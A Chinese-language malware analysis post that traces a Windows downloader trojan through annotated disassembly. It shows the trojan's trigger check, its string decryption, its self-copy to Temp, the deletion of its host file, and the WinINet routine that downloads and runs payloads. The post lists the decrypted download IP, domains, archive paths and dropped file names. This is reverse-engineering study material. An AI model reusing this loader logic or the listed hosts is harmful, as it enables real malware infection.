病毒分析之下载者(一)
病毒分析之下载者(一)1.触发条件
0x1:利用windows消息机制
0x2:判断当前目录下是否存在settings.ini
0x3:存在,启动病毒
0x4:不存在,则驻扎在进程中。
先注册窗口类,窗口过程为0x00401760。
004011A2|.8D45 D0 lea eax, eax=0x00401760
004011A5|.50 push eax ; /pWndClassEx
004011A6|.FF15 54304000 call dword ptr [<&USER32.RegisterClas>; \RegisterClassExA
利用CreateWindowsExA创建一个窗口,从参数中我们可以知道,他的Hight是为0的。
004012AC|.6A 00 push 0x0 ; /lParam = NULL
004012AE|.8B4D 08 mov ecx, ; |
004012B1|.51 push ecx ; |hInst
004012B2|.6A 00 push 0x0 ; |hMenu = NULL
004012B4|.6A 00 push 0x0 ; |hParent = NULL
004012B6|.6A 00 push 0x0 ; |Height = 0x0
004012B8|.68 00000080 push 0x80000000 ; |Width = 80000000 (-2147483648.)
004012BD|.6A 00 push 0x0 ; |Y = 0x0
004012BF|.68 00000080 push 0x80000000 ; |X = 80000000 (-2147483648.)
004012C4|.68 0000CF00 push 0xCF0000 ; |Style = WS_OVERLAPPED|WS_MINIMIZEBOX|WS_MAXIMIZEBOX|WS_SYSMENU|WS_THICKFRAME|WS_CAPTION
004012C9|.68 10404000 push 00404010 ; |WindowName = "trast"
004012CE|.68 18404000 push 00404018 ; |Class = "bask"
004012D3|.6A 00 push 0x0 ; |ExtStyle = 0
004012D5|.FF15 34304000 call dword ptr [<&USER32.CreateWindow>; \CreateWindowExA
CreateWindowsExAw会触发WM_CREATE消息,WM_CREATE是非队列消息,直接发送给窗口过程。
在WM_CREATE中,利用CreateFileA打开一个OPEN_EXISTING的settings.ini文件
004017CA > \8B4D 08 mov ecx, dword ptr
004017CD .890D E0434000 mov dword ptr , ecx
004017D3 .6A 00 push 0x0 ; /lParam = NULL
004017D5 .8B15 80424000 mov edx, dword ptr ; |23.00400000
004017DB .52 push edx ; |hInst => 00400000
004017DC .6A 00 push 0x0 ; |hMenu = NULL
004017DE .8B45 08 mov eax, dword ptr ; |
004017E1 .50 push eax ; |hParent
004017E2 .6A 1C push 0x1C ; |Height = 1C (28.)
004017E4 .68 A0000000 push 0xA0 ; |Width = A0 (160.)
004017E9 .6A 28 push 0x28 ; |Y = 28 (40.)
004017EB .6A 28 push 0x28 ; |X = 28 (40.)
004017ED .68 04000040 push 0x40000004 ; |Style = WS_CHILD|4
004017F2 .8D4D 8C lea ecx, dword ptr ; |
004017F5 .51 push ecx ; |WindowName
004017F6 .68 B4304000 push 004030B4 ; |Class = "EDIT"
004017FB .6A 00 push 0x0 ; |ExtStyle = 0
004017FD .FF15 34304000 call dword ptr [<&USER32.CreateWindow>; \CreateWindowExA
00401803 .A3 E4434000 mov dword ptr , eax
00401808 .6A 00 push 0x0 ; /hTemplateFile = NULL
0040180A .6A 00 push 0x0 ; |Attributes = 0
0040180C .6A 03 push 0x3 ; |Mode = OPEN_EXISTING
0040180E .6A 00 push 0x0 ; |pSecurity = NULL
00401810 .6A 00 push 0x0 ; |ShareMode = 0
00401812 .68 00000080 push 0x80000000 ; |Access = GENERIC_READ
00401817 .68 BC304000 push 004030BC ; |FileName = "settings.ini"
0040181C .FF15 20304000 call dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
settings.ini存在则将WM_COMMAND消息投递到线程的消息队列中,触发病毒。
settings.ini不存在则进入消息循环,常驻进程。
00401822 .8945 84 mov dword ptr , eax
00401825 .837D 84 FF cmp dword ptr , -0x1
00401829 .75 13 jnz short 0040183E
0040182B .6A 67 push 0x67 ; /lParam = 0x67
0040182D .6A 68 push 0x68 ; |wParam = 0x68
0040182F .68 11010000 push 0x111 ; |Message = WM_COMMAND
00401834 .8B55 08 mov edx, dword ptr ; |
00401837 .52 push edx ; |hWnd
00401838 .FF15 38304000 call dword ptr [<&USER32.PostMessageA>; \PostMessageA
0040183E >B8 01000000 mov eax, 0x1
WM_COMMAND消息中判断wParam的值。
wParam:0x68则创建一个模式对话框,窗口过程地址为0x00401B60。
wParam:0x69则调用DestroyWindow,销毁窗口。
0040184D > \8B45 10 mov eax, dword ptr
00401850 .25 FFFF0000 and eax, 0xFFFF
00401855 .0FB7C8 movzx ecx, ax
00401858 .894D 88 mov dword ptr , ecx
0040185B .8B55 10 mov edx, dword ptr
0040185E .C1EA 10 shr edx, 0x10
00401861 .81E2 FFFF0000 and edx, 0xFFFF
00401867 .0FB7C2 movzx eax, dx
0040186A .8945 80 mov dword ptr , eax
0040186D .8B4D 88 mov ecx, dword ptr
00401870 .898D 74FFFFFF mov dword ptr , ecx
00401876 .83BD 74FFFFFF>cmp dword ptr , 0x68
0040187D .74 0B je short 0040188A
0040187F .83BD 74FFFFFF>cmp dword ptr , 0x69
00401886 .74 20 je short 004018A8
00401888 .EB 2A jmp short 004018B4
0040188A >6A 00 push 0x0 ; /lParam = NULL
0040188C .68 601B4000 push 00401B60 ; |DlgProc = 23.00401B60
00401891 .8B55 08 mov edx, dword ptr ; |
00401894 .52 push edx ; |hOwner
00401895 .8B45 14 mov eax, dword ptr ; |
00401898 .50 push eax ; |pTemplate
00401899 .8B0D 80424000 mov ecx, dword ptr ; |23.00400000
0040189F .51 push ecx ; |hInst => 00400000
004018A0 .FF15 68304000 call dword ptr [<&USER32.DialogBoxPar>; \DialogBoxParamA
004018A6 .EB 24 jmp short 004018CC
004018A8 >8B55 08 mov edx, dword ptr
004018AB .52 push edx ; /hWnd
004018AC .FF15 30304000 call dword ptr [<&USER32.DestroyWindo>; \DestroyWindow
DialogBoxParamA会触发WM_INITDIALOG消息。
调用SendMessageA发送EM_GETHANDLE消息,用于获取文本缓冲区,SendMessageA是直接发送给窗口过程的。
缓冲区里的字符串为:Hello disop top..pussy woosy hi..little doka cry。
然后取得字符s(0x73)在字符串中第一次出现的位置,保存在local.1中,销毁窗口。
最后传入local.1,调用call 00401cB0开始病毒的解密。
00401B83|> \6A 00 push 0x0 ; /lParam = 0x0
00401B85|.6A 00 push 0x0 ; |wParam = 0x0
00401B87|.68 BD000000 push 0xBD ; |Message = EM_GETHANDLE
00401B8C|.8B0D E4434000 mov ecx, dword ptr ; |
00401B92|.51 push ecx ; |hWnd => 0x2006B0
00401B93|.FF15 40304000 call dword ptr [<&USER32.SendMessageA>; \SendMessageA
00401B99|.8945 F8 mov , eax
00401B9C|.8B55 F8 mov edx,
00401B9F|.8B02 mov eax, dword ptr
00401BA1|.8945 F4 mov , eax
00401BA4|.C745 FC 00000>mov , 0x0
00401BAB|>8B4D F4 /mov ecx,
00401BAE|.0FBE11 |movsx edx, byte ptr
00401BB1|.83FA 73 |cmp edx, 0x73
00401BB4|.74 14 |je short 00401BCA
00401BB6|.8B45 FC |mov eax,
00401BB9|.83C0 01 |add eax, 0x1
00401BBC|.8945 FC |mov , eax
00401BBF|.8B4D F4 |mov ecx,
00401BC2|.83C1 01 |add ecx, 0x1
00401BC5|.894D F4 |mov , ecx
00401BC8|.^ EB E1 \jmp short 00401BAB
00401BCA|>8B15 E0434000 mov edx, dword ptr
00401BD0|.52 push edx ; /hWnd => 002706B4 ('trast',class='bask')
00401BD1|.FF15 30304000 call dword ptr [<&USER32.DestroyWindo>; \DestroyWindow
00401BD7|.8B4D FC mov ecx,
00401BDA|.E8 D1000000 call 00401CB0
00401BDF|.33C0 xor eax, eax
2.病毒解密
0x1解密VirtualProtect字符串,并获取其地址。
0x2调用VirtualProtect赋予Write权限,解密数据
0x3获取需要的API,将本体复制到Temp目录下。
0x4判断本体存在目录是否在Temp,不是,则执行Temp目录下的病毒体,并结束当前进程
0x5是,开始执行病毒
0x00401A60=0x00401A60+(8),依次压入0x00401A68,和0x00401D40。
00401CB0 $55 push ebp
00401CB1 .BA 601A4000 mov edx, 00401A60
00401CB6 .8F05 84424000 pop dword ptr
00401CBC >42 inc edx
00401CBD .^ E2 FD loopd short 00401CBC
00401CBF .52 push edx
00401CC0 .8D35 F0434000 lea esi, dword ptr
00401CC6 .8BFE mov edi, esi
00401CC8 .68 401D4000 push 00401D40 ;入口地址
00401CCD .C3 retn ;RET 用作跳转到 00401D40
先执行0x00401D40,再跳入0x401A68执行。
00401A68|.6A 11 push 0x11
00401A6A|.6A 0B push 0xB
00401A6C|.E8 5F040000 call 00401ED0
00401A71|.5E pop esi
00401A72|.5F pop edi
00401A73|.8BE5 mov esp, ebp
00401A75|.5D pop ebp
00401A76\.C3 retn
解密算法
00401900 >/$56 push esi ;esi=key
00401901|.57 push edi ;edi=要解密的地址
00401902|.53 push ebx ;ebx=Key大小
00401903|.50 push eax ;eax为当前key指针
00401904|.5B pop ebx ;ebx=eax
00401905|.8BD3 mov edx, ebx ;edx=eax
00401907|>51 /push ecx ;ecx=Size
00401908|.E8 63000000 |call 00401970 ;解密算法
0040190D|.59 |pop ecx
0040190E|.^ E2 F7 \loopd short 00401907
00401910|.5B pop ebx
00401911|.5F pop edi
00401912|.5E pop esi
00401913|.33C0 xor eax, eax
00401915\.C3 retn
解密前的数据
004043CC89 2E CF 45 B9 AB D0 F5 CE F8 3D BA 24 C9 31 00?螮公絮硒=??.
解密后的数据
004043CC56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 VirtualProtect.
调用GetApiAddress获取VirtualProtect
00401380 > /57 push edi
00401381 . |8B0D 14304000 mov ecx, dword ptr [<&KERNEL32.GetMo>;kernel32.GetModuleHandleA
00401387 . |890D 8C424000 mov dword ptr , ecx
0040138D . |51 push ecx
0040138E . |33C0 xor eax, eax
00401390 . |E8 DB000000 call <GetApiAddress> ;得到VirtualProtect地址
00401395 . |68 B0114000 push 004011B0
0040139A . |C3 retn ;RET 用作跳转到 004011B0
给0x00402050赋予写权限,用于解密数据
0040121F > \BA 50204000 mov edx, 00402050 ;解密这块数据
00401224 .68 A00F0000 push 0FA0
00401229 .52 push edx
0040122A .8D35 10164000 lea esi, dword ptr
00401230 .FFD7 call edi ;给402050添加写权限
00401232 .B9 FA090000 mov ecx, 9FA ;ecx=9FA
00401237 .8D3D 50204000 lea edi, dword ptr ;edi=402050
0040123D .48 dec eax
0040123E .85C0 test eax, eax
00401240 .0F84 FA030000 je 00401640
解密后的字符串,数据结构为0x01+dllName+0x00+ApiName+0x00;
0040205E .4C 6F 61 64 4>ascii "LoadLibraryA",0
0040206B .47 65 74 50 7>ascii "GetProcAddress",0
0040207A 01 db 01
0040207B .6E 74 64 6C 6>ascii "ntdll.dll",0
00402085 .73 77 70 72 6>ascii "swprintf",0
0040208E .52 74 6C 44 6>ascii "RtlDecompressBuf"
0040209E .66 65 72 00 ascii "fer",0
004020A2 01 db 01
004020A3 .6B 65 72 6E 6>ascii "kernel32.dll",0
004020B0 .6C 73 74 72 6>ascii "lstrcmpW",0
004020B9 .47 65 74 43 6>ascii "GetComputerNameW"
004020C9 .00 ascii 0
004020CA .47 65 74 56 6>ascii "GetVersionExW",0
004020D8 .47 65 74 4D 6>ascii "GetModuleFileNam"
004020E8 .65 57 00 ascii "eW",0
004020EB .47 65 74 54 6>ascii "GetTempPathW",0
004020F8 .43 72 65 61 7>ascii "CreateFileW",0
00402104 .52 65 61 64 4>ascii "ReadFile",0
0040210D .57 72 69 74 6>ascii "WriteFile",0
00402117 .44 65 6C 65 7>ascii "DeleteFileW",0
00402123 .47 65 74 43 7>ascii "GetCurrentDirect"
00402133 .6F 72 79 57 0>ascii "oryW",0
00402138 .6C 73 74 72 6>ascii "lstrlenW",0
00402141 .43 6C 6F 73 6>ascii "CloseHandle",0
0040214D .47 65 74 46 6>ascii "GetFileSize",0
00402159 .56 69 72 74 7>ascii "VirtualAlloc",0
00402166 .53 6C 65 65 7>ascii "SleepEx",0
0040216E .45 78 69 74 5>ascii "ExitProcess",0
0040217A 01 db 01
0040217B .77 69 6E 69 6>ascii "wininet.dll",0
00402187 .49 6E 74 65 7>ascii "InternetOpenW",0
00402195 .49 6E 74 65 7>ascii "InternetConnectW"
004021A5 .00 ascii 0
004021A6 .48 74 74 70 4>ascii "HttpOpenRequestW"
004021B6 .00 ascii 0
004021B7 .48 74 74 70 5>ascii "HttpSendRequestW"
004021C7 .00 ascii 0
004021C8 .49 6E 74 65 7>ascii "InternetCloseHan"
004021D8 .64 6C 65 00 ascii "dle",0
004021DC .49 6E 74 65 7>ascii "InternetReadFile"
004021EC .00 ascii 0
004021ED 01 db 01
004021EE .73 68 65 6C 6>ascii "shell32.dll",0
004021FA .53 68 65 6C 6>ascii "ShellExecuteW",0
00402208 02 db 02
00402209 50 db 50 ;CHAR 'P'
0040220A 00 db 00
0040220B .25 73 25 73 0>ascii "%s%s",0
00402210 .25 73 5C 25 7>ascii "%s\%s",0
00402216 .6F 70 65 6E 0>ascii "open",0
0040221B .74 65 78 74 2>ascii "text/*",0
00402222 .61 70 70 6C 6>ascii "application/*",0
00402230 .47 45 54 00 ascii "GET",0
00402234 .4F 70 65 72 6>ascii "Opera",0
0040223A .74 7A 71 75 7>ascii "tzquw.exe",0
00402244 .39 34 2E 32 3>ascii "94.23.247.202",0
00402252 .73 6C 70 78 6>ascii "slpxl.exe",0
0040225C .70 6F 72 66 6>ascii "porfintengoweb.c"
0040226C .6F 6D 00 ascii "om",0
0040226F .2F 63 73 73 2>ascii "/css/11s1.zip",0
0040227D .6A 63 2D 63 6>ascii "jc-charge-it.nl",0
0040228D .2F 70 61 67 6>ascii "/pages/11s1.zip",0
0040229D .69 79 62 6B 6>ascii "iybkc.exe",0
004022A7 .66 6C 69 67 6>ascii "flightss.d-webs."
004022B7 .63 6F 6D 00 ascii "com",0
004022BB .2F 69 6D 61 6>ascii "/images/airlines"
004022CB .2D 6C 6F 67 6>ascii "-logo/h76id30.zi"
004022DB .70 00 ascii "p",0
004022DD .65 74 61 78 6>ascii "etaxiuae.com",0
004022EA .2F 75 70 6C 6>ascii "/uploads/h76id30"
004022FA .2E 7A 69 70 0>ascii ".zip",0
004022FF .31 31 30 38 7>ascii "1108us1",0
00402307 .31 31 30 38 6>ascii "1108h",0
解密0x00402050处的数据后跳入执行
00401640 > \A1 8C424000 mov eax, dword ptr
00401645 .50 push eax
00401646 .8D15 70144000 lea edx, dword ptr [<GetApiAddress>]
0040164C .52 push edx
0040164D .B8 28000000 mov eax, 28
00401652 .E8 A9020000 call <解密CALL>
00401657 .85C0 test eax, eax
00401659 .0F84 F1090000 je 00402050
很常见的定位代码
00402050 > \E8 00000000 call 00402055
00402055 $5B pop ebx
00402056 .83C3 09 add ebx, 9 ;定位解密后的数据
00402059 .E9 CE020000 jmp 0040232C
获取相关函数地址
00402331 .895D F4 mov dword ptr , ebx
00402334 .53 push ebx
00402335 .FF75 04 push dword ptr
00402338 .FF55 00 call dword ptr ;得到LoadLibraryA地址
0040233B .8945 FC mov dword ptr , eax
0040233E .50 push eax
0040233F .33C0 xor eax, eax
00402341 >8A03 mov al, byte ptr
00402343 .43 inc ebx
00402344 .85C0 test eax, eax
00402346 .^ 75 F9 jnz short 00402341 ;定位下一个函数字符串
00402348 .53 push ebx
00402349 .FF75 04 push dword ptr
0040234C .FF55 00 call dword ptr ;得到GetProcAddress地址
0040234F .8945 F8 mov dword ptr , eax
00402352 .50 push eax
00402353 .8BF3 mov esi, ebx
00402355 >AC lods byte ptr
00402356 .84C0 test al, al
00402358 .^ 75 FB jnz short 00402355
0040235A .AC lods byte ptr
0040235B .FEC8 dec al ;Switch (cases 1..2)
0040235D .74 0F je short 0040236E ;载入dll
0040235F .FEC8 dec al
00402361 .74 14 je short 00402377
00402363 .4E dec esi ;Default case of switch 0040235B
00402364 .56 push esi
00402365 .FF75 F0 push dword ptr
00402368 .FF55 F8 call dword ptr ;GetProcAddress
0040236B .50 push eax
0040236C .^ EB E7 jmp short 00402355
0040236E >56 push esi ;Case 1 of switch 0040235B
0040236F .FF55 FC call dword ptr ;LadLibrary
00402372 .8945 F0 mov dword ptr , eax
00402375 .^ EB DE jmp short 00402355
得到的Api地址
0012F9E0 7D685FDDshell32.ShellExecuteW
0012F9E4 7669826Fwininet.InternetReadFile
0012F9E8 76694DD4wininet.InternetCloseHandle
0012F9EC 766E36ACwininet.HttpSendRequestW
0012F9F0 7669F507wininet.HttpOpenRequestW
0012F9F4 7669EE30wininet.InternetConnectW
0012F9F8 7668AF85wininet.InternetOpenW
0012F9FC 7C81CB12kernel32.ExitProcess
0012FA00 7C8023A0kernel32.SleepEx
0012FA04 7C809AF1kernel32.VirtualAlloc
0012FA08 7C810B17kernel32.GetFileSize
0012FA0C 7C809BE7kernel32.CloseHandle
0012FA10 7C809AA9kernel32.lstrlenW
0012FA14 7C80B917kernel32.GetCurrentDirectoryW
0012FA18 7C831F63RETURN to kernel32.DeleteFileW
0012FA1C 7C810E27kernel32.WriteFile
0012FA20 7C801812kernel32.ReadFile
0012FA24 7C810800kernel32.CreateFileW
0012FA28 7C830791RETURN to kernel32.GetTempPathW
0012FA2C 7C80B475kernel32.GetModuleFileNameW
0012FA30 7C80AF05kernel32.GetVersionExW
0012FA34 7C8316CFkernel32.GetComputerNameW
0012FA38 7C80AA6Ckernel32.lstrcmpW
0012FA3C 7C980BE1ntdll.RtlDecompressBuffer
0012FA40 7C9384BBRETURN to ntdll.swprintf
0012FA44 7C80AE40kernel32.GetProcAddress
0012FA48 7C801D7Bkernel32.LoadLibraryA
0012FA4C 7D590000offset shell32.#599
0012FA50 0040205EASCII "LoadLibraryA"
0012FA54 7C80AE40kernel32.GetProcAddress
0012FA58 7C801D7Bkernel32.LoadLibraryA
定位三个用于获取字符串偏移的函数,并将解密后的字符串数据复制到新申请的空间中,以UNICODE码形式。
00402377 > \8B45 F4 mov eax, dword ptr ;Case 2 of switch 0040235B
0040237A .8BC8 mov ecx, eax
0040237C .05 42060000 add eax, 642 ;定位Unknow_1
00402381 .50 push eax
00402382 .8BC1 mov eax, ecx
00402384 .05 4D060000 add eax, 64D ;定位Unknow_2
00402389 .50 push eax
0040238A .8BC1 mov eax, ecx
0040238C .05 5A050000 add eax, 55A ;定位Unknow_3
00402391 .50 push eax
00402392 .8BEC mov ebp, esp
00402394 .81C4 8CFDFFFF add esp, -274
0040239A >6A 04 push 4
0040239C .68 00100000 push 1000
004023A1 .68 C0D8A700 push 0A7D8C0
004023A6 .6A 00 push 0
004023A8 .FF55 30 call dword ptr ;VirtualAlloc
004023AB .85C0 test eax, eax ;eax=0x00A70000
004023AD .^ 74 EB je short 0040239A
004023AF .8945 BC mov dword ptr , eax
004023B2 .05 80841E00 add eax, 1E8480
004023B7 .8945 B8 mov dword ptr , eax
004023BA .05 00127A00 add eax, 7A1200
004023BF .8945 F4 mov dword ptr , eax
004023C2 .B9 00100000 mov ecx, 1000
004023C7 .03C1 add eax, ecx
004023C9 .8945 F0 mov dword ptr , eax
004023CC .03C1 add eax, ecx
004023CE .03C1 add eax, ecx
004023D0 .8945 D0 mov dword ptr , eax
004023D3 .03C1 add eax, ecx
004023D5 .8945 FC mov dword ptr , eax
004023D8 .8BD8 mov ebx, eax
004023DA .03C1 add eax, ecx
004023DC .8BF8 mov edi, eax
004023DE .33C0 xor eax, eax
004023E0 .66:AD lods word ptr
004023E2 .8945 AC mov dword ptr , eax ;var_54=0x50
004023E5 .33C0 xor eax, eax
004023E7 .8BC8 mov ecx, eax
004023E9 .8BD0 mov edx, eax
004023EB >893B mov dword ptr , edi
004023ED .83C3 04 add ebx, 4
004023F0 >AC lods byte ptr ;esi=0x0040220B
004023F1 .3C 01 cmp al, 1
004023F3 .74 09 je short 004023FE
004023F5 .66:AB stos word ptr es: ;0x13FE680
004023F7 .41 inc ecx
004023F8 .84C0 test al, al
004023FA .^ 75 F4 jnz short 004023F0
004023FC .^ EB ED jmp short 004023EB
004023FE >33C0 xor eax, eax
00402400 .AC lods byte ptr
00402401 .8975 F8 mov dword ptr , esi
00402404 .C1E0 02 shl eax, 2
00402407 .03F0 add esi, eax
00402409 .33C0 xor eax, eax
0040240B .AC lods byte ptr
0040240C .8945 A4 mov dword ptr , eax
0040240F .897D A0 mov dword ptr , edi
00402412 .8BC8 mov ecx, eax
00402414 .FC cld
00402415 >AD lods dword ptr
00402416 .AB stos dword ptr es:
00402417 .33C0 xor eax, eax
00402419 .66:AD lods word ptr
0040241B .AB stos dword ptr es:
0040241C .^ E2 F7 loopd short 00402415
0040241E .B8 00040000 mov eax, 400 ;将ASCIIl转成UNICODE
00402423 .897D B0 mov dword ptr , edi
00402426 .03F8 add edi, eax
00402428 .897D 94 mov dword ptr , edi
0040242B .8BDF mov ebx, edi
0040242D .03D8 add ebx, eax
0040242F .B0 2F mov al, 2F
00402431 .AA stos byte ptr es:
00402432 .33C0 xor eax, eax
00402434 .AA stos byte ptr es:
00402435 .B8 C8000000 mov eax, 0C8
获取计算机名和系统版本号,得到当前模块的完整路径名,将当前文件读入VirtualAlloc申请的空间中。
在临时目录下创建tzquw.exe文件与完整路径名进行两者对比,这也是触发条件之一。
0040243A .8D75 98 lea esi, dword ptr
0040243D .8906 mov dword ptr , eax
0040243F .56 push esi
00402440 .57 push edi
00402441 .FF55 60 call dword ptr ;GetComputerNameW
00402444 .AD lods dword ptr
00402445 .D1E0 shl eax, 1
00402447 .03F8 add edi, eax
00402449 .B0 2F mov al, 2F
0040244B .AA stos byte ptr es:
0040244C .33C0 xor eax, eax
0040244E .AA stos byte ptr es:
0040244F .B4 04 mov ah, 4
00402451 .895D 98 mov dword ptr , ebx
00402454 .8BFB mov edi, ebx
00402456 .03D8 add ebx, eax
00402458 .B9 1C010000 mov ecx, 11C
0040245D .8BF3 mov esi, ebx
0040245F .890E mov dword ptr , ecx
00402461 .56 push esi
00402462 .FF55 5C call dword ptr ;GetVersionExW
00402465 .33C0 xor eax, eax
00402467 .B0 2F mov al, 2F
00402469 .66:AB stos word ptr es:
0040246B .AD lods dword ptr
0040246C .AD lods dword ptr
0040246D .04 30 add al, 30
0040246F .66:AB stos word ptr es:
00402471 .AD lods dword ptr
00402472 .04 30 add al, 30
00402474 .66:AB stos word ptr es:
00402476 .81C6 0E010000 add esi, 10E
0040247C .AC lods byte ptr
0040247D .3C 01 cmp al, 1
0040247F .74 0C je short 0040248D
00402481 .B0 53 mov al, 53
00402483 .66:AB stos word ptr es:
00402485 .B0 45 mov al, 45
00402487 .66:AB stos word ptr es:
00402489 .B0 52 mov al, 52
0040248B .66:AB stos word ptr es:
0040248D >83EE 07 sub esi, 7
00402490 .66:AD lods word ptr
00402492 .66:85C0 test ax, ax
00402495 .74 12 je short 004024A9
00402497 .50 push eax
00402498 .B0 2D mov al, 2D
0040249A .66:AB stos word ptr es:
0040249C .B0 53 mov al, 53
0040249E .66:AB stos word ptr es:
004024A0 .B0 50 mov al, 50
004024A2 .66:AB stos word ptr es:
004024A4 .58 pop eax
004024A5 .04 30 add al, 30
004024A7 .66:AB stos word ptr es:
004024A9 >33C0 xor eax, eax
004024AB .B0 2F mov al, 2F
004024AD .66:AB stos word ptr es:
004024AF .33C0 xor eax, eax
004024B1 .66:AB stos word ptr es:
004024B3 .BB FF0F0000 mov ebx, 0FFF
004024B8 .8B7D F4 mov edi, dword ptr
004024BB .53 push ebx
004024BC .57 push edi
004024BD .33C0 xor eax, eax
004024BF .50 push eax
004024C0 .FF55 58 call dword ptr ;GetModuleFileNameW
004024C3 .8B75 F0 mov esi, dword ptr
004024C6 .56 push esi
004024C7 .53 push ebx
004024C8 .FF55 54 call dword ptr ;GetTempPathW
004024CB .B9 07000000 mov ecx, 7
004024D0 .FF55 08 call dword ptr ;获得tzquw.exe字符串
004024D3 .50 push eax
004024D4 .56 push esi
004024D5 .B9 00000000 mov ecx, 0
004024DA .FF55 08 call dword ptr
004024DD .50 push eax
004024DE .56 push esi
004024DF .FF55 6C call dword ptr ;swprintf
004024E2 .83C4 18 add esp, 18
004024E5 >33C0 xor eax, eax
004024E7 .50 push eax
004024E8 .68 80000000 push 80
004024ED .6A 03 push 3
004024EF .50 push eax
004024F0 .6A 01 push 1
004024F2 .68 00000080 push 80000000
004024F7 .57 push edi
004024F8 .FF55 50 call dword ptr ;CreateFileW
004024FB .83F8 FF cmp eax, -1
004024FE .^ 74 E5 je short 004024E5 ;直到成功创建为止
00402500 .8945 EC mov dword ptr , eax
00402503 .6A 00 push 0
00402505 .50 push eax
00402506 .FF55 34 call dword ptr
00402509 .8945 E8 mov dword ptr , eax
0040250C .50 push eax
0040250D .57 push edi
0040250E .FF55 3C call dword ptr
00402511 .40 inc eax
00402512 .D1E0 shl eax, 1
00402514 .8945 D4 mov dword ptr , eax
00402517 .59 pop ecx
00402518 .03C8 add ecx, eax
0040251A .8BF1 mov esi, ecx
0040251C .8B45 BC mov eax, dword ptr
0040251F .8945 E4 mov dword ptr , eax
00402522 .6A 00 push 0
00402524 .8D4D E0 lea ecx, dword ptr
00402527 .51 push ecx
00402528 .FF75 E8 push dword ptr
0040252B .50 push eax
0040252C .FF75 EC push dword ptr
0040252F .FF55 4C call dword ptr ;ReadFileA(读入VirtualAlloc申请的基址中)
00402532 .FF75 F0 push dword ptr
00402535 .FF75 F4 push dword ptr
00402538 .FF55 64 call dword ptr ;lstrcmpW
0040253B .85C0 test eax, eax
0040253D .0F84 7C010000 je 004026BF ;判断是否是在temp路径下执行
当前执行目录不为临时目录,则将文件写入临时目录中,然后执行,结束当前进程。
0040257B .57 push edi
0040257C .8D4D E0 lea ecx, dword ptr
0040257F .51 push ecx
00402580 .56 push esi
00402581 .FF75 E4 push dword ptr
00402584 .50 push eax
00402585 .FF55 48 call dword ptr ;WriteFile
00402588 .FF75 EC push dword ptr
0040258B .FF55 38 call dword ptr
0040258E .FF75 DC push dword ptr
00402591 .FF55 38 call dword ptr
00402594 .FF75 F4 push dword ptr
00402597 .68 00080000 push 800
0040259C .FF55 54 call dword ptr
0040259F .57 push edi
004025A0 .FF75 F4 push dword ptr
004025A3 .57 push edi
004025A4 .FF75 F0 push dword ptr
004025A7 .B9 02000000 mov ecx, 2
004025AC .FF55 08 call dword ptr
004025AF .50 push eax
004025B0 .57 push edi
004025B1 .FF55 0C call dword ptr ;ShellExecuteW tzquw.exe
004025B4 .57 push edi
004025B5 .FF55 28 call dword ptr ;ExitProcess
当前执行目录为临时目录,则取宿主路径名,直到删除宿主才进行破坏。
004026BF > \8B55 E4 mov edx, dword ptr ;edx=BaseAddr
004026C2 .0FB742 3C movzx eax, word ptr ;定位PE头偏移
004026C6 .03D0 add edx, eax ;定位PE头
004026C8 .0FB74A 06 movzx ecx, word ptr ;ecx=节数
004026CC .83C2 14 add edx, 14
004026CF .0FB702 movzx eax, word ptr ;eax=可选头大小
004026D2 .40 inc eax
004026D3 .40 inc eax
004026D4 .40 inc eax
004026D5 .40 inc eax
004026D6 .03D0 add edx, eax ;定位节表
004026D8 .B8 28000000 mov eax, 28
004026DD .49 dec ecx
004026DE >03D0 add edx, eax
004026E0 .49 dec ecx
004026E1 .^ 75 FB jnz short 004026DE ;定位资源节
004026E3 .8B42 08 mov eax, dword ptr
004026E6 .C1E8 09 shr eax, 9
004026E9 .40 inc eax
004026EA .C1E0 09 shl eax, 9
004026ED .0342 14 add eax, dword ptr ;文件偏移
004026F0 .8B7D E4 mov edi, dword ptr
004026F3 .03F8 add edi, eax
004026F5 .FF75 EC push dword ptr
004026F8 .FF55 38 call dword ptr
004026FB .BE 2C010000 mov esi, 12C
00402700 >57 push edi
00402701 .FF55 44 call dword ptr ;删除宿主
00402704 .85C0 test eax, eax
00402706 .75 0D jnz short 00402715
00402708 .6A 01 push 1
0040270A .68 E8030000 push 3E8
0040270F .FF55 2C call dword ptr ;SleepEx 直到删除成功
00402712 .4E dec esi
00402713 .^ 75 EB jnz short 00402700
00402715 >33F6 xor esi, esi
利用wininet api进行下载,然后执行。
00402715 >33F6 xor esi, esi
00402717 . |56 push esi
00402718 . |56 push esi
00402719 . |56 push esi
0040271A . |6A 00 push 0
0040271C . |B9 06000000 mov ecx, 6
00402721 . |FF55 08 call dword ptr
00402724 . |50 push eax
00402725 . |FF55 24 call dword ptr ;InternetOpenW
00402728 . |85C0 test eax, eax
0040272A .^\74 E9 je short 00402715
0040272C .8945 D8 mov dword ptr , eax
0040272F .8B7D D0 mov edi, dword ptr
00402732 .B9 03000000 mov ecx, 3
00402737 .FF55 08 call dword ptr
0040273A .AB stos dword ptr es:
0040273B .B9 04000000 mov ecx, 4
00402740 .FF55 08 call dword ptr
00402743 .AB stos dword ptr es:
00402744 .33C9 xor ecx, ecx
00402746 .51 push ecx
00402747 .51 push ecx
00402748 .6A 03 push 3
0040274A .51 push ecx
0040274B .51 push ecx
0040274C .8B45 AC mov eax, dword ptr
0040274F .50 push eax
00402750 .B1 08 mov cl, 8
00402752 .FF55 08 call dword ptr
00402755 .50 push eax
00402756 .FF75 D8 push dword ptr
00402759 .FF55 20 call dword ptr ;InternetConnectW
0040275C .8945 8C mov dword ptr , eax
0040275F .33C0 xor eax, eax
00402761 .AB stos dword ptr es:
00402762 .8945 CC mov dword ptr , eax
00402765 .8945 C8 mov dword ptr , eax
00402768 .8945 A8 mov dword ptr , eax
0040276B .FF55 00 call dword ptr
0040276E .33C0 xor eax, eax
00402770 .8BD0 mov edx, eax
00402772 >8B45 A8 mov eax, dword ptr
00402775 .FF55 04 call dword ptr
00402778 .85D2 test edx, edx
0040277A .74 04 je short 00402780
0040277C .38D0 cmp al, dl
0040277E .74 0C je short 0040278C
00402780 >8AD0 mov dl, al
00402782 .B8 01000000 mov eax, 1
00402787 .52 push edx
00402788 .FF55 00 call dword ptr ;发送下载请求
...
00402878 > /51 push ecx
00402879 . |56 push esi
0040287A . |FF75 C0 push dword ptr
0040287D . |57 push edi
0040287E . |FF75 C8 push dword ptr
00402881 . |FF55 10 call dword ptr ;wininet.InternetReadFile
...
004028D1 .8945 C0 mov dword ptr , eax
004028D4 .8945 E0 mov dword ptr , eax
